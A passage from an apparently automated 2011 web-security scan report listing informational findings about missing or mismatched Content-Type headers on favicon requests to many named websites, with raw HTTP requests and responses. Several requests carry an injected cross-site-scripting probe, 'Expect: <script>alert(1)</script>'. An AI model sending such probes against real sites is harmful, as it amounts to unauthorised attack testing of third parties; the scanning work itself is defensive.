User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wtma.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

31.265. http://www.wyyo.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.wyyo.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

31.266. http://www.x-tremegeek.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.x-tremegeek.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.x-tremegeek.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:25:20 GMT
Server: Apache
Last-Modified: Tue, 27 Jul 2010 20:11:55 GMT
ETag: "422cf3-47e-48c641cd238c0"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain

............ .h.......(....... ..... ................................................J....-C..:X.........<..................................."....A`..*>..Wx..Hi..%,..\{.....e..........................
...[SNIP]...

32. Content type is not specified previous next
There are 34 instances of this issue:

http://ads.bluelithium.com/st
http://pcm1.map.pulsemgr.com/uds/pc
http://www.actonsoftware.com/favicon.ico
http://www.ariens.com/favicon.ico
http://www.bizsiteservice.com/favicon.ico
http://www.cariboucoffee.com/favicon.ico
http://www.clubpogo.com/favicon.ico
http://www.embark.com/favicon.ico
http://www.freebeerandhotwings.com/favicon.ico
http://www.fujifilmusa.com/favicon.ico
http://www.greentreepayday.com/favicon.ico
http://www.gsmls.com/favicon.ico
http://www.healthychildren.org/favicon.ico
http://www.homeawayrealestate.com/favicon.ico
http://www.homegauge.com/favicon.ico
http://www.hrs.com/favicon.ico
http://www.indygov.org/favicon.ico
http://www.jjc.edu/favicon.ico
http://www.mercadoclics.com/favicon.ico
http://www.myleather.com/favicon.ico
http://www.narrowad.com/favicon.ico
http://www.navsea.navy.mil/favicon.ico
http://www.preloved.co.uk/favicon.ico
http://www.purolatorautofilters.net/favicon.ico
http://www.rotohog.com/favicon.ico
http://www.scusd.edu/favicon.ico
http://www.skyviewzone.com/favicon.ico
http://www.smithsfoodanddrug.com/favicon.ico
http://www.softballsavings.com/favicon.ico
http://www.sueddeutsche.de/favicon.ico
http://www.thebar.com/favicon.ico
http://www.viacom.com/favicon.ico
http://www.vivareal.us/favicon.ico
http://www.wrinklebest.com/favicon.ico

Issue description

If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

32.1. http://ads.bluelithium.com/st previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.bluelithium.com
Path:	/st

Request

Response

32.2. http://pcm1.map.pulsemgr.com/uds/pc previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pcm1.map.pulsemgr.com
Path:	/uds/pc

Request

GET /uds/pc?ptnr=21272&sig=7f55db33fbb1aeb3132ef7151d50c9d9 HTTP/1.1
Host: pcm1.map.pulsemgr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1190;c=1;s=1;d=9;w=300;h=250;$=audiencescience300x250

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 43
Date: Tue, 03 May 2011 15:41:31 GMT

GIF89a.............!.......,...........D..;

32.3. http://www.actonsoftware.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.actonsoftware.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.actonsoftware.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"1150-1300332243000"
Last-Modified: Thu, 17 Mar 2011 03:24:03 GMT
Content-Length: 1150
Date: Tue, 03 May 2011 10:48:41 GMT

............ .h.......(....... ..... ...................................................................................................................M...1...3...P...................................
...[SNIP]...

32.4. http://www.ariens.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ariens.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ariens.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 NOT FOUND
Cache-Control: private,max-age=0
Content-Length: 13
Server: Microsoft-IIS/7.0
Exires: Mon, 18 Apr 2011 10:39:44 GMT
Public-Extension: http://schemas.microsoft.com/repl-2
X-Powered-By: ASP.NET
MicrosoftSharePointTeamServices: 12.0.0.6335
Date: Tue, 03 May 2011 10:39:44 GMT

404 NOT FOUND

32.5. http://www.bizsiteservice.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bizsiteservice.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bizsiteservice.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

32.6. http://www.cariboucoffee.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cariboucoffee.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cariboucoffee.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

32.7. http://www.clubpogo.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.clubpogo.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.clubpogo.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
ETag: W/"766-1118367449000"
Last-Modified: Fri, 10 Jun 2005 01:37:29 GMT
Content-Length: 766
Date: Tue, 03 May 2011 10:56:05 GMT
Server: Apache-Coyote/1.1

...... ..............(... ...@.........................................................................................................................................................................
...[SNIP]...

32.8. http://www.embark.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.embark.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.embark.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 NOT FOUND
Date: Tue, 03 May 2011 10:25:08 GMT
Server: Microsoft-IIS/6.0
MicrosoftSharePointTeamServices: 12.0.0.6315
X-Powered-By: ASP.NET
Exires: Mon, 18 Apr 2011 10:25:08 GMT
Cache-Control: private,max-age=0
Content-Length: 724
Public-Extension: http://schemas.microsoft.com/repl-2



<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title></title>
<meta HTTP-EQUIV="Content-Type" content="text/html; charset=utf-8" />
<meta HTTP-EQUIV="Expires" content="0" />
...[SNIP]...

32.9. http://www.freebeerandhotwings.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebeerandhotwings.com
Path:	/favicon.ico

Request

Response

32.10. http://www.fujifilmusa.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.fujifilmusa.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.fujifilmusa.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

32.11. http://www.greentreepayday.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.greentreepayday.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.greentreepayday.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

32.12. http://www.gsmls.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gsmls.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gsmls.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

32.13. http://www.healthychildren.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.healthychildren.org
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.healthychildren.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 NOT FOUND
Cache-Control: private,max-age=0
Content-Length: 13
Server: Microsoft-IIS/7.0
Exires: Mon, 18 Apr 2011 10:39:27 GMT
Public-Extension: http://schemas.microsoft.com/repl-2
X-Powered-By: ASP.NET
MicrosoftSharePointTeamServices: 12.0.0.6421
Date: Tue, 03 May 2011 10:39:26 GMT

404 NOT FOUND

32.14. http://www.homeawayrealestate.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.homeawayrealestate.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.homeawayrealestate.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Resin/3.1.8
ETag: "4TuZXDYfKVa"
Last-Modified: Tue, 31 Aug 2010 15:52:10 GMT
Content-Length: 1150
Date: Tue, 03 May 2011 10:29:15 GMT
Set-Cookie: NSC_IBSF_Qfstjtufodf_Hspvq=ffffffffaf141c9b45525d5f4f58455e445a4a4229a0;path=/;httponly

............ .h.......(....... ..... ...................................................................................................................................................................
...[SNIP]...

32.15. http://www.homegauge.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.homegauge.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.homegauge.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Resin/3.0.26
P3P: CP="DSP ALL CUR OUR PUBi BUS NAV COM STA INT PHY DEM UNI ONL"
ETag: "E+Sq7GIZzr3"
Last-Modified: Wed, 31 Dec 2008 18:03:24 GMT
Accept-Ranges: bytes
Content-Length: 1406
Date: Tue, 03 May 2011 10:20:03 GMT

..............h.......(....... ...............................................@ .@........`..@@@.............................................p...H... ........x...p...d...\...T...L...H...4h...........
...[SNIP]...

32.16. http://www.hrs.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hrs.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hrs.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Wed, 27 Apr 2011 22:00:00 GMT
Content-Length: 3638
Date: Tue, 03 May 2011 10:25:54 GMT
Connection: close

...... ..........&...........h.......(... ...@...................................v...^F......J"..Vb..............fR..:....r...
......>B..>:......2...........bB..........fv..vb..Z6..&.......JR........
...[SNIP]...

32.17. http://www.indygov.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.indygov.org
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.indygov.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 NOT FOUND
Date: Tue, 03 May 2011 10:45:41 GMT
Server: Systems Web - V2.6 Boost
Exires: Mon, 18 Apr 2011 10:45:41 GMT
Cache-Control: private,max-age=0
Content-Length: 760
Public-Extension: http://schemas.microsoft.com/repl-2
Set-Cookie: NSC_wjq-nptt-80=ffffffffc4f2183845525d5f4f58455e445a4a423660;path=/;httponly

<html>
<head>
   <meta HTTP-EQUIV="Content-Type" content="text/html; charset=utf-8" />
   <meta HTTP-EQUIV="Expires" content="0" />
   <noscript>
       <meta http-equiv="refresh" content="0; url="http://w
...[SNIP]...

32.18. http://www.jjc.edu/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jjc.edu
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.jjc.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response

32.19. http://www.mercadoclics.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mercadoclics.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mercadoclics.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Resin/3.0.18
ETag: "9z5ixbuw6kj"
Last-Modified: Thu, 02 Jul 2009 05:51:34 GMT
X-UA-Compatible: IE=EmulateIE7
Content-Length: 5174
Date: Tue, 03 May 2011 08:19:53 GMT
X-Varnish: 3331600757
Age: 0
Connection: keep-alive
via: 1.1 Varnish (dblvarnish10)

..............h...&...00..............(....... ...........@.............................................................}......................vi.V3*......wz..:)...z..........~w......... ...Q.........
...[SNIP]...

32.20. http://www.myleather.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.myleather.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.myleather.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

32.21. http://www.narrowad.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.narrowad.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.narrowad.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: Resin/3.0.19
X-UA-Compatible: IE=EmulateIE7
ETag: "AIk5FQkP6He"
Last-Modified: Thu, 09 Aug 2007 03:34:34 GMT
Accept-Ranges: bytes
Content-Length: 591
Date: Tue, 03 May 2011 10:55:38 GMT

GIF89a........pp................``....lT...................5..'.................<
....qq.#..E
.iS....hc...................s.....t.......@2..t.83....UR....00.qp..........30.....t.J.....QP.vr.c8.......
...[SNIP]...

32.22. http://www.navsea.navy.mil/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.navsea.navy.mil
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.navsea.navy.mil
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 NOT FOUND
Date: Tue, 03 May 2011 10:40:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
MicrosoftSharePointTeamServices: 12.0.0.6421
Exires: Mon, 18 Apr 2011 10:40:51 GMT
Cache-Control: private,max-age=0
Public-Extension: http://schemas.microsoft.com/repl-2
Content-Length: 13
Proxy-Connection: Keep-Alive
Connection: Keep-Alive

404 NOT FOUND

32.23. http://www.preloved.co.uk/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.preloved.co.uk
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.preloved.co.uk
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:00:29 GMT
Server: Microsoft-IIS/6.0
Cache-Control: private
X-Server: www2
Accept-Ranges: bytes
ETag: W/"318-1302622613570"
Last-Modified: Tue, 12 Apr 2011 15:36:53 GMT
Content-Length: 318

..............(.......(....... ................................!..!)..)1..9B..BB..BJ..NN..V^..mq................................................A..........+..........................................q.
...[SNIP]...

32.24. http://www.purolatorautofilters.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.purolatorautofilters.net
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.purolatorautofilters.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 NOT FOUND
Date: Tue, 03 May 2011 10:24:07 GMT
Server: Microsoft-IIS/6.0
MicrosoftSharePointTeamServices: 12.0.0.6219
X-Powered-By: ASP.NET
Exires: Mon, 18 Apr 2011 10:24:07 GMT
Cache-Control: private,max-age=0
Content-Length: 13
Public-Extension: http://schemas.microsoft.com/repl-2

404 NOT FOUND

32.25. http://www.rotohog.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.rotohog.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rotohog.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Server: BigIP
Connection: Keep-Alive
Content-Length: 596

<html><head><title>Page Not Found</title></head><body>Page Not Found Rotohog.com</body></html>
...[SNIP]...

32.26. http://www.scusd.edu/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scusd.edu
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.scusd.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 NOT FOUND
Cache-Control: private,max-age=0
Content-Length: 19360
Server: Microsoft-IIS/7.0
Exires: Mon, 18 Apr 2011 12:16:31 GMT
Public-Extension: http://schemas.microsoft.com/repl-2
X-Powered-By: ASP.NET
MicrosoftSharePointTeamServices: 12.0.0.6420
Date: Tue, 03 May 2011 12:16:30 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><META NAME="ROBOTS" CONTENT="NOHTMLINDEX"/>
...[SNIP]...

32.27. http://www.skyviewzone.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.skyviewzone.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.skyviewzone.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 200 OK
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>FireHost Protection</title>
...[SNIP]...

32.28. http://www.smithsfoodanddrug.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.smithsfoodanddrug.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.smithsfoodanddrug.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-NODE: FoxTrot
Exires: Mon, 18 Apr 2011 10:57:14 GMT
Content-Length: 13
Public-Extension: http://schemas.microsoft.com/repl-2
Cache-Control: private, max-age=0
Date: Tue, 03 May 2011 10:57:14 GMT
Connection: close

404 NOT FOUND

32.29. http://www.softballsavings.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.softballsavings.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.softballsavings.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"1334-1138295436000"
Last-Modified: Thu, 26 Jan 2006 17:10:36 GMT
Content-Length: 1334
Date: Tue, 03 May 2011 10:15:16 GMT

BM6.......6...(................................................................................ @.. `.. ... ... ... ...@...@ ..@@..@`..@...@...@...@...`...` ..`@..``..`...`...`...`........ ...@...`...
...[SNIP]...

32.30. http://www.sueddeutsche.de/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sueddeutsche.de
Path:	/favicon.ico

Request

Response

32.31. http://www.thebar.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.thebar.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thebar.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:34:40 GMT
Connection: close
Content-Length: 100

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Date: Tue, 03 May 2011 10:34:41 GMT
Connection: close

32.32. http://www.viacom.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.viacom.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.viacom.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
MicrosoftSharePointTeamServices: 12.0.0.6421
Exires: Mon, 18 Apr 2011 11:15:14 GMT
Content-Length: 13
Public-Extension: http://schemas.microsoft.com/repl-2
Cache-Control: private, max-age=0
Expires: Tue, 03 May 2011 11:15:14 GMT
Date: Tue, 03 May 2011 11:15:14 GMT
Connection: close

404 NOT FOUND

32.33. http://www.vivareal.us/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vivareal.us
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.vivareal.us
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"1150-1304366808000"
Last-Modified: Mon, 02 May 2011 20:06:48 GMT
Content-Length: 1150
Expires: Tue, 03 May 2011 10:47:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 03 May 2011 10:47:28 GMT
Connection: close

............ .h.......(....... ..... ...........................H...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g.M*....A...g...g...g...g...g...g...g...g...g...g...g...g...g...g.H$..H$..dB
...[SNIP]...

32.34. http://www.wrinklebest.com/favicon.ico previous

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wrinklebest.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wrinklebest.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

33. SSL certificate previous

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.mavitunasecurity.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	www.mavitunasecurity.com
Issued by:	Starfield Secure Certification Authority
Valid from:	Sat Aug 21 10:02:55 CDT 2010
Valid to:	Sun Aug 26 05:09:38 CDT 2012

Certificate chain #1

Issued to:	Starfield Secure Certification Authority
Issued by:	Starfield Class 2 Certification Authority
Valid from:	Wed Nov 15 19:15:40 CST 2006
Valid to:	Sun Nov 15 19:15:40 CST 2026

Certificate chain #2

Issued to:	Starfield Class 2 Certification Authority
Issued by:	Starfield Class 2 Certification Authority
Valid from:	Tue Jun 29 12:39:16 CDT 2004
Valid to:	Thu Jun 29 12:39:16 CDT 2034

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.

Report generated by XSS.CX at Tue May 03 20:33:44 CDT 2011.